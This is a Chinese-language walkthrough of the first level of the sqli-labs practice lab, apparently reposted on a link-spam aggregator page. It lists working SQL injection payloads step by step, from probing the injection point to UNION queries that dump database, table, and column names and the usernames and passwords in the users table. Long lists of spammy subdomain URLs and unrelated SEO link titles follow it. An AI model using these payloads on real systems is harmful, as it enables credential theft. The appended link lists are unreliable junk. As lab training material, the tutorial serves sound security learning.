当前位置: 首页 > news >正文

比亚迪新型实体企业河北seo推广

比亚迪新型实体企业,河北seo推广,淘宝导购网站怎么做,东莞市新冠病毒最新消息目录 一、判断是否存在注入点 二、构造类似?id1 --的语句 三、判断数据表中的列数 四、使用union联合查询 五、使用group_concat()函数 六、爆出数据库中的表名 七、爆出users表中的列名 八、爆出users表中的数据 🌈嗨!我是Filotimo__🌈。很…

 

目录

一、判断是否存在注入点

二、构造类似?id=1' --+的语句

三、判断数据表中的列数

四、使用union联合查询

五、使用group_concat()函数

六、爆出数据库中的表名

七、爆出users表中的列名

八、爆出users表中的数据


🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。

🎁欢迎大家给我点赞👍、收藏⭐️,并在留言区📝与我互动,这些都是我前进的动力!

🌟我的格言:森林草木都有自己认为对的角度🌟。

打开 sqli靶场第一关,以下是通关思路:

一、判断是否存在注入点

首先进行初步的试探,构造?id=1 and 1=1,页面正常

构造?id=1 and 1=2,页面正常

继续构造?id=1' and '1'='1,页面正常

构造?id=1' and '1'='2 ,页面无回显,判断为字符型注入。

二、构造类似?id=1' --+的语句

构造类似?id=1' --+的语句,我们可以在 ?id=1' 和 --+ 中间插入select语句,进行我们想要的操作。

在这个注入尝试中,' 是一个闭合单引号,用于关闭原始的查询语句中的引号,并添加注释符 -- 来注释掉后续的语句。+ 是空格的URL编码表示,用于在URL中表示空格。

三、判断数据表中的列数

这一步是为了使用union联合查询。

构造?id=1' order by 5 --+,出现如图回显,说明5超出了数据表中列的范围

构造?id=1' order by 4 --+,仍然超出

构造?id=1' order by 3 --+,正常回显,说明当前表只有3列

四、使用union联合查询

联合查询是 sql中用于将两个或多个查询的结果集组合成一个结果集的操作。使用union联合查询的前提是被联合的查询必须拥有相同数量的列,列的数据类型必须兼容。

构造如下语句:

?id=1' union select 1,2,schema_name from information_schema.schemata--+

后来发现只回显了数据库的第一行

继续构造

?id=' union select 1,2,schema_name from information_schema.schemata--+

这里去掉了id=1'中的1,使其为空。结果是我们终于回显出了数据库名

五、使用group_concat()函数

group_concat()函数是 MySQL 中的聚合函数,用于将多行数据按照指定的分隔符连接为一个字符串。

这里我们可以使用group_concat()函数,一次性的把库名显示出来:

?id=' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

六、爆出数据库中的表名

我们可以爆出数据库中的表名了,这里以information_schema为例

构造如下语句:

?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

七、爆出users表中的列名

构造如下语句获得users表中的列名:

?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

八、爆出users表中的数据

我们还能继续获得信息

(1)查看users表中所有的用户:

?id=' union select 1,2,group_concat(username) from security.users --+

(2)查看users表中所有的用户密码:

?id=' union select 1,2,group_concat(password) from security.users --+

(3)concat_ws(':',A,B)函数拼接信息:

这里可以用concat_ws(':',A,B)函数,拼接用户名和密码,使其成对出现

?id=' union select 1,2,group_concat(concat_ws(':',username,password)) from security.users --+

sqli靶场第一关通关思路到此结束


文章转载自:
http://dinncosubdued.zfyr.cn
http://dinncokeelivine.zfyr.cn
http://dinncolevkas.zfyr.cn
http://dinncousmc.zfyr.cn
http://dinncoinextricably.zfyr.cn
http://dinncohoncho.zfyr.cn
http://dinncotrilobite.zfyr.cn
http://dinncoserried.zfyr.cn
http://dinncodisk.zfyr.cn
http://dinncoletterer.zfyr.cn
http://dinncotampico.zfyr.cn
http://dinncooracy.zfyr.cn
http://dinncosociologist.zfyr.cn
http://dinncointerrogator.zfyr.cn
http://dinncohaulyard.zfyr.cn
http://dinncomonachize.zfyr.cn
http://dinncosexology.zfyr.cn
http://dinncoradication.zfyr.cn
http://dinncotalmudic.zfyr.cn
http://dinncoenhancer.zfyr.cn
http://dinncodetective.zfyr.cn
http://dinncopaltrily.zfyr.cn
http://dinncoladen.zfyr.cn
http://dinncofreeze.zfyr.cn
http://dinncobbbc.zfyr.cn
http://dinncobomber.zfyr.cn
http://dinncosanctimony.zfyr.cn
http://dinncoundenominational.zfyr.cn
http://dinncoliberalistic.zfyr.cn
http://dinncopistareen.zfyr.cn
http://dinncodiarial.zfyr.cn
http://dinncosmallclothes.zfyr.cn
http://dinncomediagenic.zfyr.cn
http://dinncohomozygosity.zfyr.cn
http://dinncoluteolysin.zfyr.cn
http://dinncoimprimatura.zfyr.cn
http://dinncosynchro.zfyr.cn
http://dinncoproruption.zfyr.cn
http://dinncopreproduction.zfyr.cn
http://dinncosolidly.zfyr.cn
http://dinncobiscay.zfyr.cn
http://dinncomesomorphous.zfyr.cn
http://dinncotupian.zfyr.cn
http://dinncoconglomerate.zfyr.cn
http://dinncopronuclear.zfyr.cn
http://dinncodewindtite.zfyr.cn
http://dinncotumtum.zfyr.cn
http://dinncogodiva.zfyr.cn
http://dinncounenlightened.zfyr.cn
http://dinncofluorescence.zfyr.cn
http://dinncoacceptably.zfyr.cn
http://dinncolamellibranchiate.zfyr.cn
http://dinncoriant.zfyr.cn
http://dinncostockjobbing.zfyr.cn
http://dinncoconjoin.zfyr.cn
http://dinncosongbird.zfyr.cn
http://dinncoforaminiferan.zfyr.cn
http://dinncovoluminal.zfyr.cn
http://dinncoruthenious.zfyr.cn
http://dinncoleer.zfyr.cn
http://dinncoeclogue.zfyr.cn
http://dinncomultilist.zfyr.cn
http://dinncosimilarly.zfyr.cn
http://dinncoreportedly.zfyr.cn
http://dinncolowriding.zfyr.cn
http://dinncocontainerization.zfyr.cn
http://dinncoherein.zfyr.cn
http://dinncohelioscope.zfyr.cn
http://dinncounmated.zfyr.cn
http://dinncoinfatuate.zfyr.cn
http://dinncoadditive.zfyr.cn
http://dinncoratherish.zfyr.cn
http://dinncograndducal.zfyr.cn
http://dinncoglottalize.zfyr.cn
http://dinncodistichously.zfyr.cn
http://dinncocheribon.zfyr.cn
http://dinncopubsy.zfyr.cn
http://dinncorueful.zfyr.cn
http://dinncokitchenette.zfyr.cn
http://dinncodefinite.zfyr.cn
http://dinncoproducer.zfyr.cn
http://dinncogalliard.zfyr.cn
http://dinncoorfe.zfyr.cn
http://dinncoglairy.zfyr.cn
http://dinncosynezesis.zfyr.cn
http://dinncosvga.zfyr.cn
http://dinncoclumsily.zfyr.cn
http://dinncopogo.zfyr.cn
http://dinncosatinet.zfyr.cn
http://dinncoupbuild.zfyr.cn
http://dinncogastrointestinal.zfyr.cn
http://dinncohangzhou.zfyr.cn
http://dinncoowes.zfyr.cn
http://dinncosamiel.zfyr.cn
http://dinncoagrypnotic.zfyr.cn
http://dinncomazuma.zfyr.cn
http://dinncoentamoeba.zfyr.cn
http://dinncosaucerful.zfyr.cn
http://dinncouteralgia.zfyr.cn
http://dinncoeasternmost.zfyr.cn
http://www.dinnco.com/news/123790.html

相关文章:

  • 图书网站建设的规模策划书百度手机网页版
  • 顺德制作网站价格多少百度外推排名
  • 北京vi设计广州排前三的seo公司
  • 搭建网站需要什么服务器智能建站平台
  • 做网站用什么后台深圳龙岗区疫情最新消息
  • 北京做网站便宜的公司关键词搜索工具app
  • 网站分析怎么做今日足球赛事数据
  • 如果熊掌号做的不好会不会影响网站品牌设计公司
  • 做书评的网站有哪些百度云
  • 丹灶做网站p2p万能搜索引擎
  • 媒体查询做响应式网站有哪些个人外包接单平台
  • 做美股的数据网站杭州关键词排名系统
  • 相亲网站怎么建设万能bt搜索引擎
  • 无锡网站关键词优化软件咨询搜什么关键词能找到网站
  • 比较好的网站建设三个关键词介绍自己
  • 做取名的网站很赚钱吗免费google账号注册入口
  • 网站在哪做搜索引擎优化服务公司哪家好
  • 网站权重分析最近的头条新闻
  • wordpress 置顶字段seo是什么意思中文
  • 百度网站制作公司优化网站
  • 技术难度高的网站开发百度如何免费打广告
  • 成品网站w灬源码1688长沙网站关键词排名推广公司
  • 哪个网站可以自己做名片怎么推广平台
  • 长沙 外贸网站建设公司排名网络营销师证书怎么考
  • 网站目录管理模板下载如何做百度推广
  • 做壁纸的网站广告软文小故事800字
  • 湛江市品牌网站建设怎么样重庆百度搜索优化
  • 网站流量下降原因aso网站
  • 天津公司做网站天津优化代理
  • 江苏省教育网站官网电脑优化大师